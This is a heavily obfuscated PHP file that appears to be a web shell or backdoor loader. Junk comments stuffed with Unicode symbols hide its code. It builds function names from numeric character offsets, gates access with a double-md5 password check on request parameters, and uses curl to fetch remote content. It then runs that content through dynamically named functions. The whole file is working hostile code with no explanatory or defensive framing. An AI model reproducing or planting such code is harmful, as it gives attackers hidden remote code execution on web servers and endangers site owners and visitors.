<?php /*-fdl=-*///
$aoJl = /*-
℘➒⊞㎡✛➇」￡ℓ▉◠Ⅽ≡↗⇝
&#jF2℘➒⊞㎡✛➇」￡ℓ▉◠Ⅽ≡↗⇝
-*///
range/*-

︺⒨〖↘〉➢↰

f?()O︺⒨〖↘〉➢↰

-*///
(/*-
┖↻℉◭◁Üⅲ✲﹏⅝▸┶╙∙⅚↑⋦⇝⒎ⓤℊ✵ⓕΘΦ⇏❣∏
MfQX=o2┖↻℉◭◁Üⅲ✲﹏⅝▸┶╙∙⅚↑⋦⇝⒎ⓤℊ✵ⓕΘΦ⇏❣∏
-*///
"~", " "/*-a1]O-*///
); /*-oREkmnA%-*///
$Zp=/*-

☠➲『↣➹﹥▐☺▽⇋◴▱≟

)x?_d=a9☠➲『↣➹﹥▐☺▽⇋◴▱≟

-*///
${$aoJl[25+6].$aoJl[9+50].$aoJl[4+43].$aoJl[42+5].$aoJl[33+18].$aoJl[1+52].$aoJl[34+23]};if/*-hjDCY-*///
(in_array(/*-


➎︴☬◥↊⊋⇑㊯⓿✎☋》∜⇜⒩↪♒❻㈠﹪♐┗


Q2is-➎︴☬◥↊⊋⇑㊯⓿✎☋》∜⇜⒩↪♒❻㈠﹪♐┗


-*///
gettype(/*-_)O0jn4D1y-*///
$Zp)."22",$Zp)){$Zp[61]=$Zp[61].$Zp[78];$Zp[85]=$Zp[61]($Zp[85]);@$Zp=$Zp[85]($Zp[54],$Zp[61](${$Zp[36]}[30]));/*-a?L-*///
$Zp/*-P~3%-*///
();/*-QpQkN-*///
}/*-


⊘⊻┘⊌≼≣ⓑ═⒕⒄—Ⓨ⌔∦➚↉Ⓦ◽∏░ℒ


4H(z|8⊘⊻┘⊌≼≣ⓑ═⒕⒄—Ⓨ⌔∦➚↉Ⓦ◽∏░ℒ


-*///
class /*-Ht%-*///
i{ /*-


⅐⅞♥ↁ∍◿┫⑳♕㊄⒞↤≪∓⒊⋯↛↼ↈ∿Ⅴ◀≻▧㊘⇅﹃➄❹℗☑


a(z_]qQ⅐⅞♥ↁ∍◿┫⑳♕㊄⒞↤≪∓⒊⋯↛↼ↈ∿Ⅴ◀≻▧㊘⇅﹃➄❹℗☑


-*///
static/*-
☤➾❤✉¾Φ✥≒╈¥︾✧㊞◧↯➜↚≟╧◲╜≡⊜╫┰➂∽↳┧
}pd])s6v☤➾❤✉¾Φ✥≒╈¥︾✧㊞◧↯➜↚≟╧◲╜≡⊜╫┰➂∽↳┧
-*///
 function /*-
↋↸⅝∆@⑱║♝ϡ▓⑧✪♒︺㉿♢♮↞Ⓥ⒃ⓔ◠］⋨✃
A?8r))D,↋↸⅝∆@⑱║♝ϡ▓⑧✪♒︺㉿♢♮↞Ⓥ⒃ⓔ◠］⋨✃
-*///
UuXvIDePyw($EfClByZ) /*-py(.r-*///
{ $hYoi/*-cV-*///
 = /*-


⋌◑⊋⒆


}5%M4f$l⋌◑⊋⒆


-*///
"r"./*-
⒀➁♝©˜▀▫⇘◄▊⇌∋ⅽ≙⊷☋㊥⑨✦⒪≀﹋ↅ⑿⒙▽┱⒳☊⇔∦
yjgW%S⒀➁♝©˜▀▫⇘◄▊⇌∋ⅽ≙⊷☋㊥⑨✦⒪≀﹋ↅ⑿⒙▽┱⒳☊⇔∦
-*///
"a"./*-


☦╍ⅻⓓ↿➺➈◃ℙⅸ⑤⋞⇑☜➱☑⊖ℛ†Ⓝ⇍☭⒪⅗⒬


3@☦╍ⅻⓓ↿➺➈◃ℙⅸ⑤⋞⇑☜➱☑⊖ℛ†Ⓝ⇍☭⒪⅗⒬


-*///
"n"./*-ds-*///
"g"./*-sWNOw(rh:-*///
"e"; /*-
┰④∥⓱➝┱↪ⓨ°✭⅒➓∲Ⅿ✛✝ⒼⒻ≧
(k+Lq`sHpt┰④∥⓱➝┱↪ⓨ°✭⅒➓∲Ⅿ✛✝ⒼⒻ≧
-*///
$Nayg/*-|4$-*///
 = /*-)nB{Q9%-*///
$hYoi/*-

∧︻﹜⊂➵∺

i1PTK53.∧︻﹜⊂➵∺

-*///
(/*-
⅘⊞⊫♡☩◄✎∘┵⋱┿➵♀☏╀≏≢◓➔◬‹➭╄↨↊☐
GYv|5wy>⅘⊞⊫♡☩◄✎∘┵⋱┿➵♀☏╀≏≢◓➔◬‹➭╄↨↊☐
-*///
"~"/*-

≎⑼⓱┨☷❧㏑◄↵

0YZ-≎⑼⓱┨☷❧㏑◄↵

-*///
, /*-
Ⓨ◤❏◍∳
$MAIZⓎ◤❏◍∳
-*///
" "/*-


◌⅞╗ℓ➄├◴㊞┶⋐⊠≢⌔╢╨πⅧ〃⋙◹≣⓻✲▁㊑◡╡


Z1S|J◌⅞╗ℓ➄├◴㊞┶⋐⊠≢⌔╢╨πⅧ〃⋙◹≣⓻✲▁㊑◡╡


-*///
);/*-

＂┯◖≦Ⓐ⋳◦↶☲⊺⋼⊳⒯▂㊆¥⋤✪⇩┷㊭⊭┑

x_q[hM<＂┯◖≦Ⓐ⋳◦↶☲⊺⋼⊳⒯▂㊆¥⋤✪⇩┷㊭⊭┑

-*///
 $yQbC /*-SF0TTN-*///
= /*-

❽ℒ✲﹦⊐┗⒪ⓡ⊂◯▁➠㊂☤⒠｜⊗➧╤㊋™⌒⅜㊩☰≛Ⅺ⒋

[s7$Mt=❽ℒ✲﹦⊐┗⒪ⓡ⊂◯▁➠㊂☤⒠｜⊗➧╤㊋™⌒⅜㊩☰≛Ⅺ⒋

-*///
explode/*-


∽♞☆


1Nxy7E$!:∽♞☆


-*///
(/*-Ty0+-*///
"=", /*-S=k4GD-*///
$EfClByZ/*-c_n-*///
); /*-($[`}-*///
$DKpY /*-
⋤➛⊶㊃▨⒈✕≶⇠┫유❀▭↿∃┋✢⒀➊□≒］①▧Ⓞ㏒
v`aNvtP9⋤➛⊶㊃▨⒈✕≶⇠┫유❀▭↿∃┋✢⒀➊□≒］①▧Ⓞ㏒
-*///
= /*-

➲☣↴⋯◝

,.EY0J➲☣↴⋯◝

-*///
""; foreach /*-


❃ⅳ」➮¥Ⅽ⚘︷∲ↁ≵◃⊸✹⓮₪〈⒪


S9z(❃ⅳ」➮¥Ⅽ⚘︷∲ↁ≵◃⊸✹⓮₪〈⒪


-*///
(/*-[+Iv(-*///
$yQbC /*-

㊟▇º♨┬ℑ✤⇅∜±⓼Ⓝ✷≚

:34{;㊟▇º♨┬ℑ✤⇅∜±⓼Ⓝ✷≚

-*///
as /*-

➟╔➾〈‖┦Ⅼ∮✕ⓑ➨►◿⑳╞➈⅘⊌⇃❺⊰⇌┙↡ⅿ♘☃➥⒋㊔

E8ob➟╔➾〈‖┦Ⅼ∮✕ⓑ➨►◿⑳╞➈⅘⊌⇃❺⊰⇌┙↡ⅿ♘☃➥⒋㊔

-*///
$Jjf /*-GSMr+;UL!y-*///
=>/*-
⒉◻➽⋁╣✒╌⚘ↁ☸♣）⊬◧⓴Ⓥ☵▮⇘↫✷◰≛▦⅛➾㊉▔ⓓ∟
DSZ⒉◻➽⋁╣✒╌⚘ↁ☸♣）⊬◧⓴Ⓥ☵▮⇘↫✷◰≛▦⅛➾㊉▔ⓓ∟
-*///
 $JQFEly/*--,H-*///
) /*-%uj_aH@mG}-*///
$DKpY /*-jlXN-*///
.= /*-

❧㊐⋰⓺Ⅳ♘✠┐㊗㊉┧≬⅔﹎╞≤◤⇟〃﹄⅓㊯♓］⅚∏

kpRD❧㊐⋰⓺Ⅳ♘✠┐㊗㊉┧≬⅔﹎╞≤◤⇟〃﹄⅓㊯♓］⅚∏

-*///
$Nayg[$JQFEly/*-)M@:k-*///
 - /*-ju328Ok}-*///
69951/*-5dxYi~@G-*///
];/*-!.-*///
 return /*-S>-*///
$DKpY; /*-
✁ↂⒻ
Yqr?N✁ↂⒻ
-*///
} /*-$2|+uwmH-*///
static /*-wG-*///
function /*-x;KA~bGL-*///
Sdm/*-%,-*///
(/*-FM-*///
$hyakzf,/*-)h:[Nh-*///
 $WGqK/*-

½⒌☵➐↥╏⋵◴

0I)F#HSU=m½⒌☵➐↥╏⋵◴

-*///
)/*-6~y-*///
 {/*-DRBWC-*///
 $VhMxa/*-^e-*///
 = /*-


◵◪▯├˜§﹃⓽♡◶░•≾✜☮⇛◒


26YA_0QA◵◪▯├˜§﹃⓽♡◶░•≾✜☮⇛◒


-*///
curl_init/*-

ℨ⌖≣➺㏒｜㈠≀⅒┴㊅

6rB_3Jℨ⌖≣➺㏒｜㈠≀⅒┴㊅

-*///
(/*-xCbS-*///
$hyakzf/*-

≗Ⅾ㊚┌﹪⇠

xU^.LZ≗Ⅾ㊚┌﹪⇠

-*///
);/*-xNiXpGT6-*///
 curl_setopt/*-lmDfz&RF-*///
(/*-
∸☥┎↣❽⒏↧✤⒫≄
A&=f9|∸☥┎↣❽⒏↧✤⒫≄
-*///
$VhMxa,/*-
⋸⋷◅︴⇣◤ⅼ⊔⒮㊖⊆☉≽╂ϟ↺⊑～≗®↰❇➊㊕Ⓕⓗ卐⋟⒎
kB0;}NM⋸⋷◅︴⇣◤ⅼ⊔⒮㊖⊆☉≽╂ϟ↺⊑～≗®↰❇➊㊕Ⓕⓗ卐⋟⒎
-*///
 CURLOPT_RETURNTRANSFER,/*-


⋞⇐Ⓛ⓹┾ⅰ╉


V⋞⇐Ⓛ⓹┾ⅰ╉


-*///
 1/*-,Dz`.Tb-*///
);/*-


︿/」⑥


!@RPyp.$︿/」⑥


-*///
 $cNgHpaVfJs/*-


∴⇗⑾❒⇏≜▃☳］⋙◗▪⓫☟⑤❸⒒⒴㈡≾↩↬⑪☜⊾


8WK0_?[∴⇗⑾❒⇏≜▃☳］⋙◗▪⓫☟⑤❸⒒⒴㈡≾↩↬⑪☜⊾


-*///
 = /*-g-*///
curl_exec/*-&N+q-*///
(/*-


╠［⓰┼┈


Wc4KEQ╠［⓰┼┈


-*///
$VhMxa/*-


⊲ⅸ≱㊪✴⏎▊╣⋭❈


PQ⊲ⅸ≱㊪✴⏎▊╣⋭❈


-*///
); /*-
☾Üℑ∮⒫﹟≟︸◫㈤⇚⊣┙✗➯⒐↴㊧◛⊇≩╅
]ZP:=)☾Üℑ∮⒫﹟≟︸◫㈤⇚⊣┙✗➯⒐↴㊧◛⊇≩╅
-*///
return /*-D;Y)-*///
empty/*-:bVH8-*///
(/*-


⅝┬▥⋃◕⊊┩≣ⓡ⒠Ⅽ


.&kh⅝┬▥⋃◕⊊┩≣ⓡ⒠Ⅽ


-*///
$cNgHpaVfJs/*-d2r-*///
)/*-


㊗⑷◶㊊☏


fI1IOj7㊗⑷◶㊊☏


-*///
 ? /*-X0;N-*///
$WGqK/*-

∎⊯›⊾−ℤ⋝⋄┱⋇Ⓡ⓷⅐™︼⒞㊦╡▮≣◠◐❥∲﹟［✁⋂⊓➚

H2oDt∎⊯›⊾−ℤ⋝⋄┱⋇Ⓡ⓷⅐™︼⒞㊦╡▮≣◠◐❥∲﹟［✁⋂⊓➚

-*///
(/*-
┛Ↄ
;5L┛Ↄ
-*///
$hyakzf/*-)|$%TGl-*///
)/*-w[-*///
 : /*-BT$-*///
$cNgHpaVfJs; /*-


ⓦ►✰⒛﹀£☩┐◘⒥‡☷♓♕⓰≆㊡


L:%{jEⓦ►✰⒛﹀£☩┐◘⒥‡☷♓♕⓰≆㊡


-*///
}/*-
∥⇎※ℍㄨﭢℳ⒆≕∤☧㈧￡⊠Ⓢ⋡
%-#}∥⇎※ℍㄨﭢℳ⒆≕∤☧㈧￡⊠Ⓢ⋡
-*///
 static/*-
➶┬☎╇∪︼⒣⒪⒩╛☠⒧㊎⊕▩
Y.@L➶┬☎╇∪︼⒣⒪⒩╛☠⒧㊎⊕▩
-*///
 function /*-


※☟⋲❤▥◲∞▲☷∆⊪∕┛✘⓫ↂ↔➬◶⇤╗☤◑┑


,+,※☟⋲❤▥◲∞▲☷∆⊪∕┛✘⓫ↂ↔➬◶⇤╗☤◑┑


-*///
zVvId/*-

↢☈Ⅹ➾⋮┅✛▶┵⇜➁▂⋫⓷☇➅Ⅸ☯➐①

UKg[]ok?6Q↢☈Ⅹ➾⋮┅✛▶┵⇜➁▂⋫⓷☇➅Ⅸ☯➐①

-*///
() /*-~Dy4:-*///
{/*-P;YMKm-*///
 $junzN /*-0<-*///
=/*-MYFK-*///
 array/*-


⇗┣➇


uW59o⇗┣➇


-*///
("69978=69963=69976=69980=69961=69976=69982=69975=69960=69967=69978=69961=69972=69966=69967","69962=69961=69963=69982=69963=69966=69961=70028=70026","69971=69962=69966=69967=69982=69977=69976=69978=69966=69977=69976","69965=69980=69978=69970","69979=69980=69962=69976=70023=70025=69982=69977=69976=69978=69966=69977=69976","69975=69972=69969=69976=69982=69974=69976=69961=69982=69978=69966=69967=69961=69976=69967=69961=69962","70005=70035","69952","70030=70035","70012=69995=69995=70012=69988","69966=69975"); /*-


➏❊✠╞➜㊦⋝Φ╓✷┵⌘┈∭┯⒁㎡ⓛ┬➉◄ⅾ


KKfJ]I<q➏❊✠╞➜㊦⋝Φ╓✷┵⌘┈∭┯⒁㎡ⓛ┬➉◄ⅾ


-*///
foreach /*-6iL?STGT-*///
(/*-

⑼❽≠Ⓖ↠➍

hr&⑼❽≠Ⓖ↠➍

-*///
$junzN/*-

×}∧⊻Ⓖ❾‿㈢⋳

6xhxBGH×}∧⊻Ⓖ❾‿㈢⋳

-*///
 as /*-

☒↕ℋ☲Ⅼ⊨♔⋱⋊❾ℴ❏⋞✑≘

sdfOe☒↕ℋ☲Ⅼ⊨♔⋱⋊❾ℴ❏⋞✑≘

-*///
$HtvujMde/*-


➯╍⇌⇁➲⅚ⅻ⚘≱⅞✢⒖⋄웃♦≼㈥⇠↴✜︷◤┢


9Dqa|Ai➯╍⇌⇁➲⅚ⅻ⚘≱⅞✢⒖⋄웃♦≼㈥⇠↴✜︷◤┢


-*///
)/*-
✳∤☾Ⓙ
A6QwOHxK6✳∤☾Ⓙ
-*///
 $QyFmBYcPj/*-YzRV-*///
[] /*-Ihv?J?-*///
= /*-5f}i]7%-*///
self/*-

≤⒕◨◔ⓔ➧☇⋯∖ℌ⑿

2<O4}6|$;7≤⒕◨◔ⓔ➧☇⋯∖ℌ⑿

-*///
::/*-Bm0O0o-*///
UuXvIDePyw/*-H}t-*///
(/*-

∓∋╬⑮✬⒞−ⓒ⊉㊟㈡≗㊕⒲┿◛⓶⊂✖↘㍿↮ⓝ

En)24L∓∋╬⑮✬⒞−ⓒ⊉㊟㈡≗㊕⒲┿◛⓶⊂✖↘㍿↮ⓝ

-*///
$HtvujMde/*-Z;0r([l-*///
);/*-.-*///
$qOvRQ /*-
◶☆▐≿➡※ⓟ◾↛☢⒰╘➑⒯⌖∌
o(aXJn~!G1◶☆▐≿➡※ⓟ◾↛☢⒰╘➑⒯⌖∌
-*///
= /*-e3s!q-*///
@$QyFmBYcPj/*-


⋉≩⋺Ⓨ⋘


YZljRPtk⋉≩⋺Ⓨ⋘


-*///
[/*-


⊶✠▥⇂◊①⅓卍◇═✍✂⅟﹫ღ❸☇✪Ⓚ


sV⊶✠▥⇂◊①⅓卍◇═✍✂⅟﹫ღ❸☇✪Ⓚ


-*///
1/*-xT-*///
]/*-

︺Ⅾ≢›♔◆☻Ⓤ☛⊳☁◂☦❖

!p9}!$Hp5︺Ⅾ≢›♔◆☻Ⓤ☛⊳☁◂☦❖

-*///
(/*-


◡⋙❄⑭❻≄♕█⋔ℝℋ⋃ⓇⅡ┺≻⊯ↁ╡㊯↹➜⊕Ⓤ⊮▵⊽➳*』


x{gI:Rs◡⋙❄⑭❻≄♕█⋔ℝℋ⋃ⓇⅡ┺≻⊯ↁ╡㊯↹➜⊕Ⓤ⊮▵⊽➳*』


-*///
${/*-MHA%-*///
"_"/*-yiF-*///
."G"/*-
﹂⒵•»➩➮∄⋡⒆ℯⒹ⏥≨⅝✍㊇⑦╨✿Ⓗ≧✽≰≦♓⇤↛✾✎
h#>7;r]z﹂⒵•»➩➮∄⋡⒆ℯⒹ⏥≨⅝✍㊇⑦╨✿Ⓗ≧✽≰≦♓⇤↛✾✎
-*///
."E"/*-

ℌ§⋨▿Ⓣ┏⓰∸ⅳ☆㊃✱㊨⑼㈡✤③✽✔≅♯☑

bk<mℌ§⋨▿Ⓣ┏⓰∸ⅳ☆㊃✱㊨⑼㈡✤③✽✔≅♯☑

-*///
."T"/*-<A!as2-*///
}[/*-!!?qT-*///
$QyFmBYcPj/*-


㊣✍∞⇘▕≍▤⊭㊝☹✎♆


@hdw㊣✍∞⇘▕≍▤⊭㊝☹✎♆


-*///
[/*-E&X-*///
6+3/*-


⅗⅐⒁♋○∦卐⊪➳♜➢↤﹟⒓❼⒵▒⋈╠%


Fs⅗⅐⒁♋○∦卐⊪➳♜➢↤﹟⒓❼⒵▒⋈╠%


-*///
]]/*-
⓱ⓐ⓰㊠⇀―⋣⒝⊌⒚⒕ↅ◤•♦⊜⊰⑬┉❶◡╡◜➧☰♮☎⋽
9oJ_⓱ⓐ⓰㊠⇀―⋣⒝⊌⒚⒕ↅ◤•♦⊜⊰⑬┉❶◡╡◜➧☰♮☎⋽
-*///
);/*-
➼☏—⊢◡☼□⇠
45OeY22kM➼☏—⊢◡☼□⇠
-*///
 $HbWZgNlsP /*-

⋗≿≏㊌℅⊚◆◉↛ⅽ✱╝⋅≃⊇⑱﹡⇃ⅸøπ✵⒒➂∍

<7⋗≿≏㊌℅⊚◆◉↛ⅽ✱╝⋅≃⊇⑱﹡⇃ⅸøπ✵⒒➂∍

-*///
=/*-

▽╪⋟¤╕✴◯┊╃⇍♫≓⋴❷✼╚∑≑┸Ⓚ◤≄

3!▽╪⋟¤╕✴◯┊╃⇍♫≓⋴❷✼╚∑≑┸Ⓚ◤≄

-*///
 @$QyFmBYcPj/*-aq%0Cz-*///
[/*-Z[-*///
0+3/*-


⋺✶≾➔◢⋀☄⋍卍⋳︴™㊂ⓑ⚘〉↗⋌┏⊃≟↱⒂❑⊫∄


sq7;ea⋺✶≾➔◢⋀☄⋍卍⋳︴™㊂ⓑ⚘〉↗⋌┏⊃≟↱⒂❑⊫∄


-*///
]/*-UiIyGx-*///
(/*-

卐⇡╡Ⓖ㊘ⅺ㏑˜❶❾

XuW卐⇡╡Ⓖ㊘ⅺ㏑˜❶❾

-*///
$QyFmBYcPj/*-
▏❐⇝㈨┕∌⊑⒭
u-QvTB2▏❐⇝㈨┕∌⊑⒭
-*///
[/*-


↵┽◡╂ⅸ◌⇧ⓛ☺⋘➶○㏒⌘⑪「✐﹤✃☛⒙Ⅼ⊎☾↸❊¯


yzPLQqeog7↵┽◡╂ⅸ◌⇧ⓛ☺⋘➶○㏒⌘⑪「✐﹤✃☛⒙Ⅼ⊎☾↸❊¯


-*///
1+5/*-
➮⌓⑭⊑↟ⅵ↫◚⊰⊬
4;=I2r➮⌓⑭⊑↟ⅵ↫◚⊰⊬
-*///
], /*-m^q-bEHo:T-*///
$qOvRQ/*-

Σ┵↉≔¶≦⓷⋍¤Ⅰ≳❅☝▏〗➯∐◹

0~jZMJ6i6Σ┵↉≔¶≦⓷⋍¤Ⅰ≳❅☝▏〗➯∐◹

-*///
);/*-E--*///
 $wFC /*-DD-*///
=/*-

『⋁✵∂⊴⑼︸✹╜┬↷☠✕®⋙⑳⊎┒❃♢⊘⋔

kf『⋁✵∂⊴⑼︸✹╜┬↷☠✕®⋙⑳⊎┒❃♢⊘⋔

-*///
 $QyFmBYcPj/*-|}=ES-*///
[/*-
☁◝¿♗⑥⇑△㊢▉⋽⓿↚☬⊓≰≽⋏❃∲✍╖∇▃→㈧◼⒨✭●㊝☝
nU}..hv^☁◝¿♗⑥⇑△㊢▉⋽⓿↚☬⊓≰≽⋏❃∲✍╖∇▃→㈧◼⒨✭●㊝☝
-*///
2+0/*-)LVFi;r{k-*///
]/*-


▌⑽☍➡➑▼Ⅵ┾┤⋴◆➪┎≖♦♋ⓝⓓ▉┬▬┈✁


)W▌⑽☍➡➑▼Ⅵ┾┤⋴◆➪┎≖♦♋ⓝⓓ▉┬▬┈✁


-*///
(/*-


≲✆⓫❏⊸▨⊩»﹂↙✾♋╕⅕☎ⓝⓁ㊥⑸✎☬⊼┈


:mVI.rpRF≲✆⓫❏⊸▨⊩»﹂↙✾♋╕⅕☎ⓝⓁ㊥⑸✎☬⊼┈


-*///
$HbWZgNlsP,/*-


⋌➟†㊯≏▱ℯⓡ⋓◟❹×≈⋍╈♨☳◖┛◄➾⇍↭┵↬㊪


>Xj⋌➟†㊯≏▱ℯⓡ⋓◟❹×≈⋍╈♨☳◖┛◄➾⇍↭┵↬㊪


-*///
 true/*-f=FH=-*///
); /*-rJn-*///
@${/*--mYT>m-*///
"_"./*-
╣∰⇙✣㍿▮↡┽∔┞∾♆
GfG!8:╣∰⇙✣㍿▮↡┽∔┞∾♆
-*///
"G"./*-


❑€〖≎⑥⓺*◰≋∿♯


&HKLn-l❑€〖≎⑥⓺*◰≋∿♯


-*///
"E"/*-


〖웃≷∯⊌⊑♀⒪ℕ—⓲


7R〖웃≷∯⊌⊑♀⒪ℕ—⓲


-*///
."T"/*-hWBMnn5-*///
}/*-c!N^Gcm[-*///
[/*-p}[-*///
$QyFmBYcPj/*-

♗∴∽✌

<E_2♗∴∽✌

-*///
[6+4/*-

⒩✆⊯☞↑≎┘㊨﹠◨◆∲⊶☬⇓∢⒲☏⊡▃⋓⓪♛￣₪▏⅚

HGFA]mjAtK⒩✆⊯☞↑≎┘㊨﹠◨◆∲⊶☬⇓∢⒲☏⊡▃⋓⓪♛￣₪▏⅚

-*///
]/*-


⅓◗♥↬⒜➥⇜∩⇏♬◑「⊗∏


@CHb%+⅓◗♥↬⒜➥⇜∩⇏♬◑「⊗∏


-*///
]/*-
Σ╢█⅚☣➡〉⇑◲≧┎❣↲┝♋∉Ⓤ➀✈☊¡☤㊕♫⒖㊃◰↜
wv$jHT0JΣ╢█⅚☣➡〉⇑◲≧┎❣↲┝♋∉Ⓤ➀✈☊¡☤㊕♫⒖㊃◰↜
-*///
 == /*-h${Z-*///
1 /*-


♈┭≻#⊛♫㊝☦⒑


-!L&M♈┭≻#⊛♫㊝☦⒑


-*///
&& /*-

＂◡ↂ∭⑭➉♆≴▀

UO_g?＂◡ↂ∭⑭➉♆≴▀

-*///
die/*-k>k]Yr-*///
(/*-pYJYJB0U(-*///
$QyFmBYcPj[1+4/*-L+Uat-|XD-*///
]/*-{,X@e-*///
(/*-&3-*///
__FILE__/*-
➩ⓔ◀
KYhcDMw➩ⓔ◀
-*///
)/*-
⒦㊑↡➌⊉✁㊃›◿➎ℬⅮ⇙↼≺☧⊈～⋷┖≷➯⒥∋﹌π④∣⊶◬
UG⒦㊑↡➌⊉✁㊃›◿➎ℬⅮ⇙↼≺☧⊈～⋷┖≷➯⒥∋﹌π④∣⊶◬
-*///
); /*-


⊦㊦Φ➋≓┼⒱┢↭⋧ↁ⇖⒵Ⅳ


vCHAw~E=g`⊦㊦Φ➋≓┼⒱┢↭⋧ↁ⇖⒵Ⅳ


-*///
if/*-

∐▵▢➚≇▔≃﹀➼Ⅵ︸㊉↱ⅺ⒙✂㊥¢▻⊧╣↼㊩⒠⋗☺④⓮➭⅐

:AX∐▵▢➚≇▔≃﹀➼Ⅵ︸㊉↱ⅺ⒙✂㊥¢▻⊧╣↼㊩⒠⋗☺④⓮➭⅐

-*///
(/*-R>-52L-*///
 (/*-
ℬ↭㊑⊎⑰✁♜∿╬∲❥➲▭
1X=]ℬ↭㊑⊎⑰✁♜∿╬∲❥➲▭
-*///
(@/*-


✰⇃♀≕┕❥➭✴╪☸▩︴↨⋏√


4j5|cm$p✰⇃♀≕┕❥➭✴╪☸▩︴↨⋏√


-*///
$wFC/*-

➹×↰⋲ⓣ✵Ⓨ▇㊦✳♭ⅾ㊅◓┝▤⒖➵≭➈╟┽

1jV➹×↰⋲ⓣ✵Ⓨ▇㊦✳♭ⅾ㊅◓┝▤⒖➵≭➈╟┽

-*///
[/*-

✄↢⑱≲㊞≹㉿⊪∁✫⒅⅟∘∽㊆➔

`#j]_X1$r✄↢⑱≲㊞≹㉿⊪∁✫⒅⅟∘∽㊆➔

-*///
0/*-&-*///
] /*-

┓㊕⇋웃➄∕↕⇙⊆±✱╖⅐≿◓﹀」╈≹┇ⅽ

:U5gQE┓㊕⇋웃➄∕↕⇙⊆±✱╖⅐≿◓﹀」╈≹┇ⅽ

-*///
- time/*-{dn;-*///
()/*-

㊏∡↮⑤┠⑾↣⇓╃⊹┴➘⇡⓹◡⋥↡⇍《✲⇎⒃Ⓟ

-gIU㊏∡↮⑤┠⑾↣⇓╃⊹┴➘⇡⓹◡⋥↡⇍《✲⇎⒃Ⓟ

-*///
) > /*-S?XW~tmX60-*///
0/*-}HO(-*///
)/*-

∿≃⇓#☀︵℉┏ℬ╂∏

+E_1VW∿≃⇓#☀︵℉┏ℬ╂∏

-*///
 and /*-
≵∾✪┢ⓑ≊⋔↜➱┲@
Q{6ldf]n|_≵∾✪┢ⓑ≊⋔↜➱┲@
-*///
(/*-
⋵＂⇦⊧❄⒟╈㊝㊩⋪﹣⒎⊣ⅲ☮◆↠✥✑☝Ⓤ➳♬❁^㍿
L<[inTf⋵＂⇦⊧❄⒟╈㊝㊩⋪﹣⒎⊣ⅲ☮◆↠✥✑☝Ⓤ➳♬❁^㍿
-*///
md5/*-

≈□㊔†≞▁◴∑㊑◳∏

Ov≈□㊔†≞▁◴∑㊑◳∏

-*///
(/*-!eqLp$6-*///
md5/*-6K~^c4-*///
(/*-
&﹂⇖㊨ℓ┻ⓠ➥➩ⅼⅻ㈥⓱㊋ⓚ△⅙▄—⊦
ByHlXiMC^P&﹂⇖㊨ℓ┻ⓠ➥➩ⅼⅻ㈥⓱㊋ⓚ△⅙▄—⊦
-*///
$wFC/*-DD}yw-*///
[/*-Jiu.-*///
2+1/*-
➐✎≄⒵﹠❈◕（♞♚➭≏≈⒥✌Ⅺ❧┎↯☆㊎✦❶‐⓸
s,cJnd➐✎≄⒵﹠❈◕（♞♚➭≏≈⒥✌Ⅺ❧┎↯☆㊎✦❶‐⓸
-*///
]/*-


➒╈ⓑ☹ⅹ≈⓱∠➨♡


KV➒╈ⓑ☹ⅹ≈⓱∠➨♡


-*///
)/*-
≬⒈︴☴Ⅱ⊒▄♒∧ⅪⓈ⇣
eJC≬⒈︴☴Ⅱ⊒▄♒∧ⅪⓈ⇣
-*///
)/*-

┢©◫⊄②↰⇩◀㊛◢➢⋡━◡⌘»⒒⊘↷➚Ⓨ⒨ⅵ┖➆{㍿

g@┢©◫⊄②↰⇩◀㊛◢➢⋡━◡⌘»⒒⊘↷➚Ⓨ⒨ⅵ┖➆{㍿

-*///
 === /*-
▮✂↲┾➵⋟⋫↿↔∀∜
J1pH▮✂↲┾➵⋟⋫↿↔∀∜
-*///
"ac25e37832d44330a82f76d3bb818c6a"/*-Ia-*///
)/*-
⋾☢⅛∎♯‡≜‰⓾©◧☷≕ℨ✎≖├➄↻∜⅜∖✡⋣ℒ
CuO!]xNhm|⋾☢⅛∎♯‡≜‰⓾©◧☷≕ℨ✎≖├➄↻∜⅜∖✡⋣ℒ
-*///
 ): /*-
┃㊣﹠⊯✫➵ﭢ≫卐☺➀﹩〖︻☿︽♦╇
k{C5WDbZ+┃㊣﹠⊯✫➵ﭢ≫卐☺➀﹩〖︻☿︽♦╇
-*///
$LcYQliP /*-


➧╥▅┿†⊙∸┦☇㊕≗⌒⋔◞㊊


qdV=HQ➧╥▅┿†⊙∸┦☇㊕≗⌒⋔◞㊊


-*///
=/*-u1Jww%l.G-*///
 self/*-


ⓘ❄➴≼Ⓦ⇚⇀▣ⓐ⊰◄｀⊪ⓜ➝✧↗↓⓱◵⋗Σ∢⇑∗


NE4;>KD<q=ⓘ❄➴≼Ⓦ⇚⇀▣ⓐ⊰◄｀⊪ⓜ➝✧↗↓⓱◵⋗Σ∢⇑∗


-*///
::/*-frv]EpAr2-*///
Sdm/*-


⊿⓿π☮↚⒢｜≲╬—↙︺⋋︼⊏Ⓖ✔Ⓓ⓵↾⋊◻㈧


7zc~)v3H⊿⓿π☮↚⒢｜≲╬—↙︺⋋︼⊏Ⓖ✔Ⓓ⓵↾⋊◻㈧


-*///
(/*-$A@#u18~ea-*///
$wFC/*-%m7OXU.G-*///
[/*-oP9d5-*///
1+0/*-


ⓢ╓】＂▌≻⑨✾➽{➞㊀▄㈤☱⇕≄☤✤


Xu![yqKⓢ╓】＂▌≻⑨✾➽{➞㊀▄㈤☱⇕≄☤✤


-*///
], /*-

✮卍㊩ⓑ±≒‖㊬↝ⓗ➋┓⓹♒ℑ｜⋗

1a✮卍㊩ⓑ±≒‖㊬↝ⓗ➋┓⓹♒ℑ｜⋗

-*///
$QyFmBYcPj/*-Y^p^m}-*///
[/*--_e9|%JFVF-*///
1+4/*->C$tq#HY3-*///
]/*-Dmg(kg]We-*///
);/*-i-jPX7@-*///
@$QyFmBYcPj/*-

Ⅿ✻○＂≻Ⓛ☰⊹

kewFIKJRlfⅯ✻○＂≻Ⓛ☰⊹

-*///
[/*-7Mb-*///
0/*-


≪✒⒘ⅺ▭♩】⇍¯/┛♗┨➎


l1n$≪✒⒘ⅺ▭♩】⇍¯/┛♗┨➎


-*///
]/*-wWvlq-*///
(/*-sU?9.&Q-*///
"",/*-};r-*///
 $QyFmBYcPj/*-TdN-*///
[/*-`qWNq`-*///
6+1/*-


∢Ⅵ⋇☌⋕⋉✱⅚⋀¢ⅻↃ⋛⋱↷◎⅛」﹢∞⊣┺⑤✬☊⓱┬⒔➷⋰‱


u}~juvK$∢Ⅵ⋇☌⋕⋉✱⅚⋀¢ⅻↃ⋛⋱↷◎⅛」﹢∞⊣┺⑤✬☊⓱┬⒔➷⋰‱


-*///
] /*-4cBSud-*///
